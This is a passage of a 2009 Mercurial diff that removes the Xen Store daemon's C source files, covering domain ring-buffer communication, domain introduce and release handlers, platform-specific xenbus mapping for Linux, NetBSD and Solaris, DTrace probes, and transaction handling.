-       /* Must read indexes once, and before anything else, and verified. */
-       cons = intf->rsp_cons;
-       prod = intf->rsp_prod;
-       xen_mb();
-
-       if (!check_indexes(cons, prod)) {
-               errno = EIO;
-               return -1;
-       }
-
-       dest = get_output_chunk(cons, prod, intf->rsp, &avail);
-       if (avail < len)
-               len = avail;
-
-       memcpy(dest, data, len);
-       xen_mb();
-       intf->rsp_prod += len;
-
-       xc_evtchn_notify(xce_handle, conn->domain->port);
-
-       return len;
-}
-
-static int readchn(struct connection *conn, void *data, unsigned int len)
-{
-       uint32_t avail;
-       const void *src;
-       struct xenstore_domain_interface *intf = conn->domain->interface;
-       XENSTORE_RING_IDX cons, prod;
-
-       /* Must read indexes once, and before anything else, and verified. */
-       cons = intf->req_cons;
-       prod = intf->req_prod;
-       xen_mb();
-
-       if (!check_indexes(cons, prod)) {
-               errno = EIO;
-               return -1;
-       }
-
-       src = get_input_chunk(cons, prod, intf->req, &avail);
-       if (avail < len)
-               len = avail;
-
-       memcpy(data, src, len);
-       xen_mb();
-       intf->req_cons += len;
-
-       xc_evtchn_notify(xce_handle, conn->domain->port);
-
-       return len;
-}
-
-static int destroy_domain(void *_domain)
-{
-       struct domain *domain = _domain;
-
-       list_del(&domain->list);
-
-       if (domain->port) {
-               if (xc_evtchn_unbind(xce_handle, domain->port) == -1)
-                       eprintf("> Unbinding port %i failed!\n", domain->port);
-       }
-
-       if (domain->interface)
-               munmap(domain->interface, getpagesize());
-
-       fire_watches(NULL, "@releaseDomain", false);
-
-       return 0;
-}
-
-static void domain_cleanup(void)
-{
-       xc_dominfo_t dominfo;
-       struct domain *domain, *tmp;
-       int notify = 0;
-
-       list_for_each_entry_safe(domain, tmp, &domains, list) {
-               if (xc_domain_getinfo(*xc_handle, domain->domid, 1,
-                                     &dominfo) == 1 &&
-                   dominfo.domid == domain->domid) {
-                       if ((dominfo.crashed || dominfo.shutdown)
-                           && !domain->shutdown) {
-                               domain->shutdown = 1;
-                               notify = 1;
-                       }
-                       if (!dominfo.dying)
-                               continue;
-               }
-               talloc_free(domain->conn);
-               notify = 0; /* destroy_domain() fires the watch */
-       }
-
-       if (notify)
-               fire_watches(NULL, "@releaseDomain", false);
-}
-
-/* We scan all domains rather than use the information given here. */
-void handle_event(void)
-{
-       evtchn_port_t port;
-
-       if ((port = xc_evtchn_pending(xce_handle)) == -1)
-               barf_perror("Failed to read from event fd");
-
-       if (port == virq_port)
-               domain_cleanup();
-
-       if (xc_evtchn_unmask(xce_handle, port) == -1)
-               barf_perror("Failed to write to event fd");
-}
-
-bool domain_can_read(struct connection *conn)
-{
-       struct xenstore_domain_interface *intf = conn->domain->interface;
-       return (intf->req_cons != intf->req_prod);
-}
-
-bool domain_is_unprivileged(struct connection *conn)
-{
-       return (conn && conn->domain && conn->domain->domid != 0);
-}
-
-bool domain_can_write(struct connection *conn)
-{
-       struct xenstore_domain_interface *intf = conn->domain->interface;
-       return ((intf->rsp_prod - intf->rsp_cons) != XENSTORE_RING_SIZE);
-}
-
-static char *talloc_domain_path(void *context, unsigned int domid)
-{
-       return talloc_asprintf(context, "/local/domain/%u", domid);
-}
-
-static struct domain *new_domain(void *context, unsigned int domid,
-                                int port)
-{
-       struct domain *domain;
-       int rc;
-
-       domain = talloc(context, struct domain);
-       domain->port = 0;
-       domain->shutdown = 0;
-       domain->domid = domid;
-       domain->path = talloc_domain_path(domain, domid);
-
-       list_add(&domain->list, &domains);
-       talloc_set_destructor(domain, destroy_domain);
-
-       /* Tell kernel we're interested in this event. */
-       rc = xc_evtchn_bind_interdomain(xce_handle, domid, port);
-       if (rc == -1)
-           return NULL;
-       domain->port = rc;
-
-       domain->conn = new_connection(writechn, readchn);
-       domain->conn->domain = domain;
-       domain->conn->id = domid;
-
-       domain->remote_port = port;
-       domain->nbentry = 0;
-       domain->nbwatch = 0;
-
-       return domain;
-}
-
-
-static struct domain *find_domain_by_domid(unsigned int domid)
-{
-       struct domain *i;
-
-       list_for_each_entry(i, &domains, list) {
-               if (i->domid == domid)
-                       return i;
-       }
-       return NULL;
-}
-
-static void domain_conn_reset(struct domain *domain)
-{
-       struct connection *conn = domain->conn;
-       struct buffered_data *out;
-
-       conn_delete_all_watches(conn);
-       conn_delete_all_transactions(conn);
-
-       while ((out = list_top(&conn->out_list, struct buffered_data, list))) {
-               list_del(&out->list);
-               talloc_free(out);
-       }
-
-       talloc_free(conn->in->buffer);
-       memset(conn->in, 0, sizeof(*conn->in));
-       conn->in->inhdr = true;
-
-       domain->interface->req_cons = domain->interface->req_prod = 0;
-       domain->interface->rsp_cons = domain->interface->rsp_prod = 0;
-}
-
-/* domid, mfn, evtchn, path */
-void do_introduce(struct connection *conn, struct buffered_data *in)
-{
-       struct domain *domain;
-       char *vec[3];
-       unsigned int domid;
-       unsigned long mfn;
-       evtchn_port_t port;
-       int rc;
-       struct xenstore_domain_interface *interface;
-
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (conn->id != 0 || !conn->can_write) {
-               send_error(conn, EACCES);
-               return;
-       }
-
-       domid = atoi(vec[0]);
-       mfn = atol(vec[1]);
-       port = atoi(vec[2]);
-
-       /* Sanity check args. */
-       if (port <= 0) { 
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domain = find_domain_by_domid(domid);
-
-       if (domain == NULL) {
-               interface = xc_map_foreign_range(
-                       *xc_handle, domid,
-                       getpagesize(), PROT_READ|PROT_WRITE, mfn);
-               if (!interface) {
-                       send_error(conn, errno);
-                       return;
-               }
-               /* Hang domain off "in" until we're finished. */
-               domain = new_domain(in, domid, port);
-               if (!domain) {
-                       munmap(interface, getpagesize());
-                       send_error(conn, errno);
-                       return;
-               }
-               domain->interface = interface;
-               domain->mfn = mfn;
-
-               /* Now domain belongs to its connection. */
-               talloc_steal(domain->conn, domain);
-
-               fire_watches(NULL, "@introduceDomain", false);
-       } else if ((domain->mfn == mfn) && (domain->conn != conn)) {
-               /* Use XS_INTRODUCE for recreating the xenbus event-channel. */
-               if (domain->port)
-                       xc_evtchn_unbind(xce_handle, domain->port);
-               rc = xc_evtchn_bind_interdomain(xce_handle, domid, port);
-               domain->port = (rc == -1) ? 0 : rc;
-               domain->remote_port = port;
-       } else {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domain_conn_reset(domain);
-
-       send_ack(conn, XS_INTRODUCE);
-}
-
-void do_set_target(struct connection *conn, struct buffered_data *in)
-{
-       char *vec[2];
-       unsigned int domid, tdomid;
-        struct domain *domain, *tdomain;
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (conn->id != 0 || !conn->can_write) {
-               send_error(conn, EACCES);
-               return;
-       }
-
-       domid = atoi(vec[0]);
-       tdomid = atoi(vec[1]);
-
-        domain = find_domain_by_domid(domid);
-       if (!domain) {
-               send_error(conn, ENOENT);
-               return;
-       }
-        if (!domain->conn) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-        tdomain = find_domain_by_domid(tdomid);
-       if (!tdomain) {
-               send_error(conn, ENOENT);
-               return;
-       }
-
-        if (!tdomain->conn) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-        talloc_reference(domain->conn, tdomain->conn);
-        domain->conn->target = tdomain->conn;
-
-       send_ack(conn, XS_SET_TARGET);
-}
-
-/* domid */
-void do_release(struct connection *conn, const char *domid_str)
-{
-       struct domain *domain;
-       unsigned int domid;
-
-       if (!domid_str) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domid = atoi(domid_str);
-       if (!domid) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (conn->id != 0) {
-               send_error(conn, EACCES);
-               return;
-       }
-
-       domain = find_domain_by_domid(domid);
-       if (!domain) {
-               send_error(conn, ENOENT);
-               return;
-       }
-
-       if (!domain->conn) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       talloc_free(domain->conn);
-
-       send_ack(conn, XS_RELEASE);
-}
-
-void do_resume(struct connection *conn, const char *domid_str)
-{
-       struct domain *domain;
-       unsigned int domid;
-
-       if (!domid_str) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domid = atoi(domid_str);
-       if (!domid) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (conn->id != 0) {
-               send_error(conn, EACCES);
-               return;
-       }
-
-       domain = find_domain_by_domid(domid);
-       if (!domain) {
-               send_error(conn, ENOENT);
-               return;
-       }
-
-       if (!domain->conn) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domain->shutdown = 0;
-       
-       send_ack(conn, XS_RESUME);
-}
-
-void do_get_domain_path(struct connection *conn, const char *domid_str)
-{
-       char *path;
-
-       if (!domid_str) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       path = talloc_domain_path(conn, atoi(domid_str));
-
-       send_reply(conn, XS_GET_DOMAIN_PATH, path, strlen(path) + 1);
-
-       talloc_free(path);
-}
-
-void do_is_domain_introduced(struct connection *conn, const char *domid_str)
-{
-       int result;
-       unsigned int domid;
-
-       if (!domid_str) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domid = atoi(domid_str);
-       if (domid == DOMID_SELF)
-               result = 1;
-       else
-               result = (find_domain_by_domid(domid) != NULL);
-
-       send_reply(conn, XS_IS_DOMAIN_INTRODUCED, result ? "T" : "F", 2);
-}
-
-static int close_xc_handle(void *_handle)
-{
-       xc_interface_close(*(int *)_handle);
-       return 0;
-}
-
-/* Returns the implicit path of a connection (only domains have this) */
-const char *get_implicit_path(const struct connection *conn)
-{
-       if (!conn->domain)
-               return NULL;
-       return conn->domain->path;
-}
-
-/* Restore existing connections. */
-void restore_existing_connections(void)
-{
-}
-
-static int dom0_init(void) 
-{ 
-       evtchn_port_t port;
-       struct domain *dom0;
-
-       port = xenbus_evtchn();
-       if (port == -1)
-               return -1;
-
-       dom0 = new_domain(NULL, 0, port); 
-       if (dom0 == NULL)
-               return -1;
-
-       dom0->interface = xenbus_map();
-       if (dom0->interface == NULL)
-               return -1;
-
-       talloc_steal(dom0->conn, dom0); 
-
-       xc_evtchn_notify(xce_handle, dom0->port); 
-
-       return 0; 
-}
-
-/* Returns the event channel handle. */
-int domain_init(void)
-{
-       int rc;
-
-       xc_handle = talloc(talloc_autofree_context(), int);
-       if (!xc_handle)
-               barf_perror("Failed to allocate domain handle");
-
-       *xc_handle = xc_interface_open();
-       if (*xc_handle < 0)
-               barf_perror("Failed to open connection to hypervisor");
-
-       talloc_set_destructor(xc_handle, close_xc_handle);
-
-       xce_handle = xc_evtchn_open();
-
-       if (xce_handle < 0)
-               barf_perror("Failed to open evtchn device");
-
-       if (dom0_init() != 0) 
-               barf_perror("Failed to initialize dom0 state"); 
-
-       if ((rc = xc_evtchn_bind_virq(xce_handle, VIRQ_DOM_EXC)) == -1)
-               barf_perror("Failed to bind to domain exception virq port");
-       virq_port = rc;
-
-       return xce_handle;
-}
-
-void domain_entry_inc(struct connection *conn, struct node *node)
-{
-       struct domain *d;
-
-       if (!conn)
-               return;
-
-       if (node->perms && node->perms[0].id != conn->id) {
-               if (conn->transaction) {
-                       transaction_entry_inc(conn->transaction,
-                               node->perms[0].id);
-               } else {
-                       d = find_domain_by_domid(node->perms[0].id);
-                       if (d)
-                               d->nbentry++;
-               }
-       } else if (conn->domain) {
-               if (conn->transaction) {
-                       transaction_entry_inc(conn->transaction,
-                               conn->domain->domid);
-               } else {
-                       conn->domain->nbentry++;
-               }
-       }
-}
-
-void domain_entry_dec(struct connection *conn, struct node *node)
-{
-       struct domain *d;
-
-       if (!conn)
-               return;
-
-       if (node->perms && node->perms[0].id != conn->id) {
-               if (conn->transaction) {
-                       transaction_entry_dec(conn->transaction,
-                               node->perms[0].id);
-               } else {
-                       d = find_domain_by_domid(node->perms[0].id);
-                       if (d && d->nbentry)
-                               d->nbentry--;
-               }
-       } else if (conn->domain && conn->domain->nbentry) {
-               if (conn->transaction) {
-                       transaction_entry_dec(conn->transaction,
-                               conn->domain->domid);
-               } else {
-                       conn->domain->nbentry--;
-               }
-       }
-}
-
-void domain_entry_fix(unsigned int domid, int num)
-{
-       struct domain *d;
-
-       d = find_domain_by_domid(domid);
-       if (d && ((d->nbentry += num) < 0))
-               d->nbentry = 0;
-}
-
-int domain_entry(struct connection *conn)
-{
-       return (domain_is_unprivileged(conn))
-               ? conn->domain->nbentry
-               : 0;
-}
-
-void domain_watch_inc(struct connection *conn)
-{
-       if (!conn || !conn->domain)
-               return;
-       conn->domain->nbwatch++;
-}
-
-void domain_watch_dec(struct connection *conn)
-{
-       if (!conn || !conn->domain)
-               return;
-       if (conn->domain->nbwatch)
-               conn->domain->nbwatch--;
-}
-
-int domain_watch(struct connection *conn)
-{
-       return (domain_is_unprivileged(conn))
-               ? conn->domain->nbwatch
-               : 0;
-}
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
diff -r 10a8fae412c5 tools/xenstore/xenstored_domain.h
--- a/tools/xenstore/xenstored_domain.h Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,67 +0,0 @@
-/* 
-    Domain communications for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#ifndef _XENSTORED_DOMAIN_H
-#define _XENSTORED_DOMAIN_H
-
-void handle_event(void);
-
-/* domid, mfn, eventchn, path */
-void do_introduce(struct connection *conn, struct buffered_data *in);
-
-/* domid */
-void do_is_domain_introduced(struct connection *conn, const char *domid_str);
-
-/* domid */
-void do_release(struct connection *conn, const char *domid_str);
-
-/* domid */
-void do_resume(struct connection *conn, const char *domid_str);
-
-/* domid, target */
-void do_set_target(struct connection *conn, struct buffered_data *in);
-
-/* domid */
-void do_get_domain_path(struct connection *conn, const char *domid_str);
-
-/* Returns the event channel handle */
-int domain_init(void);
-
-/* Returns the implicit path of a connection (only domains have this) */
-const char *get_implicit_path(const struct connection *conn);
-
-/* Read existing connection information from store. */
-void restore_existing_connections(void);
-
-/* Can connection attached to domain read/write. */
-bool domain_can_read(struct connection *conn);
-bool domain_can_write(struct connection *conn);
-
-bool domain_is_unprivileged(struct connection *conn);
-
-/* Quota manipulation */
-void domain_entry_inc(struct connection *conn, struct node *);
-void domain_entry_dec(struct connection *conn, struct node *);
-void domain_entry_fix(unsigned int domid, int num);
-int domain_entry(struct connection *conn);
-void domain_watch_inc(struct connection *conn);
-void domain_watch_dec(struct connection *conn);
-int domain_watch(struct connection *conn);
-
-#endif /* _XENSTORED_DOMAIN_H */
diff -r 10a8fae412c5 tools/xenstore/xenstored_linux.c
--- a/tools/xenstore/xenstored_linux.c  Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,73 +0,0 @@
-/******************************************************************************
- *
- * Copyright 2006 Sun Microsystems, Inc.  All rights reserved.
- * Use is subject to license terms.
- *
- * Copyright (C) 2005 Rusty Russell IBM Corporation
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
- * published by the Free Software Foundation, version 2 of the
- * License.
- */
-
-#include <fcntl.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <sys/mman.h>
-
-#include "xenstored_core.h"
-
-#define XENSTORED_PROC_KVA  "/proc/xen/xsd_kva"
-#define XENSTORED_PROC_PORT "/proc/xen/xsd_port"
-
-evtchn_port_t xenbus_evtchn(void)
-{
-       int fd;
-       int rc;
-       evtchn_port_t port; 
-       char str[20]; 
-
-       fd = open(XENSTORED_PROC_PORT, O_RDONLY); 
-       if (fd == -1)
-               return -1;
-
-       rc = read(fd, str, sizeof(str)); 
-       if (rc == -1)
-       {
-               int err = errno;
-               close(fd);
-               errno = err;
-               return -1;
-       }
-
-       str[rc] = '\0'; 
-       port = strtoul(str, NULL, 0); 
-
-       close(fd); 
-       return port;
-}
-
-void *xenbus_map(void)
-{
-       int fd;
-       void *addr;
-
-       fd = open(XENSTORED_PROC_KVA, O_RDWR);
-       if (fd == -1)
-               return NULL;
-
-       addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE,
-               MAP_SHARED, fd, 0);
-
-       if (addr == MAP_FAILED)
-               addr = NULL;
-
-       close(fd);
-
-       return addr;
-}
-
-void xenbus_notify_running(void)
-{
-}
diff -r 10a8fae412c5 tools/xenstore/xenstored_netbsd.c
--- a/tools/xenstore/xenstored_netbsd.c Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,73 +0,0 @@
-/******************************************************************************
- *
- * Copyright 2006 Sun Microsystems, Inc.  All rights reserved.
- * Use is subject to license terms.
- *
- * Copyright (C) 2005 Rusty Russell IBM Corporation
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
- * published by the Free Software Foundation, version 2 of the
- * License.
- */
-
-#include <fcntl.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <sys/mman.h>
-
-#include "xenstored_core.h"
-
-#define XENSTORED_PROC_KVA  "/dev/xsd_kva"
-#define XENSTORED_PROC_PORT "/kern/xen/xsd_port"
-
-evtchn_port_t xenbus_evtchn(void)
-{
-       int fd;
-       int rc;
-       evtchn_port_t port; 
-       char str[20]; 
-
-       fd = open(XENSTORED_PROC_PORT, O_RDONLY); 
-       if (fd == -1)
-               return -1;
-
-       rc = read(fd, str, sizeof(str)); 
-       if (rc == -1)
-       {
-               int err = errno;
-               close(fd);
-               errno = err;
-               return -1;
-       }
-
-       str[rc] = '\0'; 
-       port = strtoul(str, NULL, 0); 
-
-       close(fd); 
-       return port;
-}
-
-void *xenbus_map(void)
-{
-       int fd;
-       void *addr;
-
-       fd = open(XENSTORED_PROC_KVA, O_RDWR);
-       if (fd == -1)
-               return NULL;
-
-       addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE,
-               MAP_SHARED, fd, 0);
-
-       if (addr == MAP_FAILED)
-               addr = NULL;
-
-       close(fd);
-
-       return addr;
-}
-
-void xenbus_notify_running(void)
-{
-}
diff -r 10a8fae412c5 tools/xenstore/xenstored_probes.d
--- a/tools/xenstore/xenstored_probes.d Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,28 +0,0 @@
-/*
- * Copyright 2007 Sun Microsystems, Inc.  All rights reserved.
- * Use is subject to license terms.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, version 2 of the License.
- */
-
-#include <sys/types.h>
-
-provider xenstore {
-       /* tx id, dom id, pid, type, msg */
-       probe msg(uint32_t, unsigned int, pid_t, int, const char *);
-       /* tx id, dom id, pid, type, reply */
-       probe reply(uint32_t, unsigned int, pid_t, int, const char *);
-       /* tx id, dom id, pid, reply */
-       probe error(uint32_t, unsigned int, pid_t, const char *);
-       /* dom id, pid, watch details */
-       probe watch_event(unsigned int, pid_t, const char *);
-};
-
-#pragma D attributes Evolving/Evolving/Common provider xenstore provider
-#pragma D attributes Private/Private/Unknown provider xenstore module
-#pragma D attributes Private/Private/Unknown provider xenstore function
-#pragma D attributes Evolving/Evolving/Common provider xenstore name
-#pragma D attributes Evolving/Evolving/Common provider xenstore args
-
diff -r 10a8fae412c5 tools/xenstore/xenstored_solaris.c
--- a/tools/xenstore/xenstored_solaris.c        Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,168 +0,0 @@
-/******************************************************************************
- *
- * Copyright 2006 Sun Microsystems, Inc.  All rights reserved.
- * Use is subject to license terms.
- *
- * Copyright (C) 2005 Rusty Russell IBM Corporation
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
- * published by the Free Software Foundation, version 2 of the
- * License.
- */
-
-#include <fcntl.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <stdarg.h>
-#include <sys/mman.h>
-#include <strings.h>
-#include <ucred.h>
-#include <stdio.h>
-
-#include <xen/sys/xenbus.h>
-
-#include "talloc.h"
-#include "xenstored_core.h"
-#include "xenstored_probes.h"
-
-evtchn_port_t xenbus_evtchn(void)
-{
-       int fd;
-       evtchn_port_t port; 
-
-       fd = open("/dev/xen/xenbus", O_RDONLY); 
-       if (fd == -1)
-               return -1;
-
-       port = ioctl(fd, IOCTL_XENBUS_XENSTORE_EVTCHN);
-
-       close(fd); 
-       return port;
-}
-
-void *xenbus_map(void)
-{
-       int fd;
-       void *addr;
-
-       fd = open("/dev/xen/xenbus", O_RDWR);
-       if (fd == -1)
-               return NULL;
-
-       addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE,
-               MAP_SHARED, fd, 0);
-
-       if (addr == MAP_FAILED)
-               addr = NULL;
-
-       close(fd);
-
-       return addr;
-}
-
-void xenbus_notify_running(void)
-{
-       int fd;
-
-       fd = open("/dev/xen/xenbus", O_RDONLY);
-
-       (void) ioctl(fd, IOCTL_XENBUS_NOTIFY_UP);
-
-       close(fd);
-}
-
-static pid_t cred(const struct connection *conn)
-{
-       ucred_t *ucred = NULL;
-       pid_t pid;
-
-       if (conn->domain)
-               return (0);
-
-       if (getpeerucred(conn->fd, &ucred) == -1)
-               return (0);
-
-       pid = ucred_getpid(ucred);
-
-       ucred_free(ucred);
-       return (pid);
-}
-
-/*
- * The strings are often a number of nil-separated strings. We'll just
- * replace the separators with spaces - not quite right, but good
- * enough.
- */
-static char *
-mangle(const struct connection *conn, const struct buffered_data *in)
-{
-       char *str;
-       int i;
-
-       if (in->hdr.msg.len == 0)
-               return (talloc_strdup(conn, ""));
-
-       if ((str = talloc_zero_size(conn, in->hdr.msg.len + 1)) == NULL)
-               return (NULL);
-
-       memcpy(str, in->buffer, in->hdr.msg.len);
-       
-       /*
-        * The protocol is absurdly inconsistent in whether the length
-        * includes the terminating nil or not; replace all nils that
-        * aren't the last one.
-        */
-       for (i = 0; i < (in->hdr.msg.len - 1); i++) {
-               if (str[i] == '\0')
-                       str[i] = ' ';
-       }
-
-       return (str);
-}
-
-void
-dtrace_io(const struct connection *conn, const struct buffered_data *in,
-    int io_out)
-{
-       if (!io_out) {
-               if (XENSTORE_MSG_ENABLED()) {
-                       char *mangled = mangle(conn, in);
-                       XENSTORE_MSG(in->hdr.msg.tx_id, conn->id, cred(conn),
-                           in->hdr.msg.type, mangled);
-               }
-
-               goto out;
-       }
-
-       switch (in->hdr.msg.type) {
-       case XS_ERROR:
-               if (XENSTORE_ERROR_ENABLED()) {
-                       char *mangled = mangle(conn, in);
-                       XENSTORE_ERROR(in->hdr.msg.tx_id, conn->id,
-                           cred(conn), mangled);
-               }
-               break;
-
-       case XS_WATCH_EVENT:
-               if (XENSTORE_WATCH_EVENT_ENABLED()) {
-                       char *mangled = mangle(conn, in);
-                       XENSTORE_WATCH_EVENT(conn->id, cred(conn), mangled);
-               }
-               break;
-
-       default:
-               if (XENSTORE_REPLY_ENABLED()) {
-                       char *mangled = mangle(conn, in);
-                       XENSTORE_REPLY(in->hdr.msg.tx_id, conn->id, cred(conn),
-                           in->hdr.msg.type, mangled);
-               }
-               break;
-       }
-
-out:
-       /*
-        * 6589130 dtrace -G fails for certain tail-calls on x86
-        */
-       asm("nop");
-}
diff -r 10a8fae412c5 tools/xenstore/xenstored_transaction.c
--- a/tools/xenstore/xenstored_transaction.c    Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,291 +0,0 @@
-/* 
-    Transaction code for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#include <stdio.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <sys/wait.h>
-#include <sys/time.h>
-#include <time.h>
-#include <assert.h>
-#include <stdarg.h>
-#include <stdlib.h>
-#include <fcntl.h>
-#include <unistd.h>
-#include "talloc.h"
-#include "list.h"
-#include "xenstored_transaction.h"
-#include "xenstored_watch.h"
-#include "xenstored_domain.h"
-#include "xs_lib.h"
-#include "utils.h"
-
-struct changed_node
-{
-       /* List of all changed nodes in the context of this transaction. */
-       struct list_head list;
-
-       /* The name of the node. */
-       char *node;
-
-       /* And the children? (ie. rm) */
-       bool recurse;
-};
-
-struct changed_domain
-{
-       /* List of all changed domains in the context of this transaction. */
-       struct list_head list;
-
-       /* Identifier of the changed domain. */
-       unsigned int domid;
-
-       /* Amount by which this domain's nbentry field has changed. */
-       int nbentry;
-};
-
-struct transaction
-{
-       /* List of all transactions active on this connection. */
-       struct list_head list;
-
-       /* Connection-local identifier for this transaction. */
-       uint32_t id;
-
-       /* Generation when transaction started. */
-       unsigned int generation;
-
-       /* TDB to work on, and filename */
-       TDB_CONTEXT *tdb;
-       char *tdb_name;
-
-       /* List of changed nodes. */
-       struct list_head changes;
-
-       /* List of changed domains - to record the changed domain entry number 
*/
-       struct list_head changed_domains;
-};
-
-extern int quota_max_transaction;
-static unsigned int generation;
-
-/* Return tdb context to use for this connection. */
-TDB_CONTEXT *tdb_transaction_context(struct transaction *trans)
-{
-       return trans->tdb;
-}
-
-/* Callers get a change node (which can fail) and only commit after they've
- * finished.  This way they don't have to unwind eg. a write. */
-void add_change_node(struct transaction *trans, const char *node, bool recurse)
-{
-       struct changed_node *i;
-
-       if (!trans) {
-               /* They're changing the global database. */
-               generation++;
-               return;
-       }
-
-       list_for_each_entry(i, &trans->changes, list)
-               if (streq(i->node, node))
-                       return;
-
-       i = talloc(trans, struct changed_node);
-       i->node = talloc_strdup(i, node);
-       i->recurse = recurse;
-       list_add_tail(&i->list, &trans->changes);
-}
-
-static int destroy_transaction(void *_transaction)
-{
-       struct transaction *trans = _transaction;
-
-       trace_destroy(trans, "transaction");
-       if (trans->tdb)
-               tdb_close(trans->tdb);
-       unlink(trans->tdb_name);
-       return 0;
-}
-
-struct transaction *transaction_lookup(struct connection *conn, uint32_t id)
-{
-       struct transaction *trans;
-
-       if (id == 0)
-               return NULL;
-
-       list_for_each_entry(trans, &conn->transaction_list, list)
-               if (trans->id == id)
-                       return trans;
-
-       return ERR_PTR(-ENOENT);
-}
-
-void do_transaction_start(struct connection *conn, struct buffered_data *in)
-{
-       struct transaction *trans, *exists;
-       char id_str[20];
-
-       /* We don't support nested transactions. */
-       if (conn->transaction) {
-               send_error(conn, EBUSY);
-               return;
-       }
-
-       if (conn->id && conn->transaction_started > quota_max_transaction) {
-               send_error(conn, ENOSPC);
-               return;
-       }
-
-       /* Attach transaction to input for autofree until it's complete */
-       trans = talloc(in, struct transaction);
-       INIT_LIST_HEAD(&trans->changes);
-       INIT_LIST_HEAD(&trans->changed_domains);
-       trans->generation = generation;
-       trans->tdb_name = talloc_asprintf(trans, "%s.%p",
-                                         xs_daemon_tdb(), trans);
-       trans->tdb = tdb_copy(tdb_context(conn), trans->tdb_name);
-       if (!trans->tdb) {
-               send_error(conn, errno);
-               return;
-       }
-       /* Make it close if we go away. */
-       talloc_steal(trans, trans->tdb);
-
-       /* Pick an unused transaction identifier. */
-       do {
-               trans->id = conn->next_transaction_id;
-               exists = transaction_lookup(conn, conn->next_transaction_id++);
-       } while (!IS_ERR(exists));
-
-       /* Now we own it. */
-       list_add_tail(&trans->list, &conn->transaction_list);
-       talloc_steal(conn, trans);
-       talloc_set_destructor(trans, destroy_transaction);
-       conn->transaction_started++;
-
-       snprintf(id_str, sizeof(id_str), "%u", trans->id);
-       send_reply(conn, XS_TRANSACTION_START, id_str, strlen(id_str)+1);
-}
-
-void do_transaction_end(struct connection *conn, const char *arg)
-{
-       struct changed_node *i;
-       struct changed_domain *d;
-       struct transaction *trans;
-
-       if (!arg || (!streq(arg, "T") && !streq(arg, "F"))) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if ((trans = conn->transaction) == NULL) {
-               send_error(conn, ENOENT);
-               return;
-       }
-
-       conn->transaction = NULL;
-       list_del(&trans->list);
-       conn->transaction_started--;
-
-       /* Attach transaction to arg for auto-cleanup */
-       talloc_steal(arg, trans);
-
-       if (streq(arg, "T")) {
-               /* FIXME: Merge, rather failing on any change. */
-               if (trans->generation != generation) {
-                       send_error(conn, EAGAIN);
-                       return;
-               }
-               if (!replace_tdb(trans->tdb_name, trans->tdb)) {
-                       send_error(conn, errno);
-                       return;
-               }
-               /* Don't close this: we won! */
-               trans->tdb = NULL;
-
-               /* fix domain entry for each changed domain */
-               list_for_each_entry(d, &trans->changed_domains, list)
-                       domain_entry_fix(d->domid, d->nbentry);
-
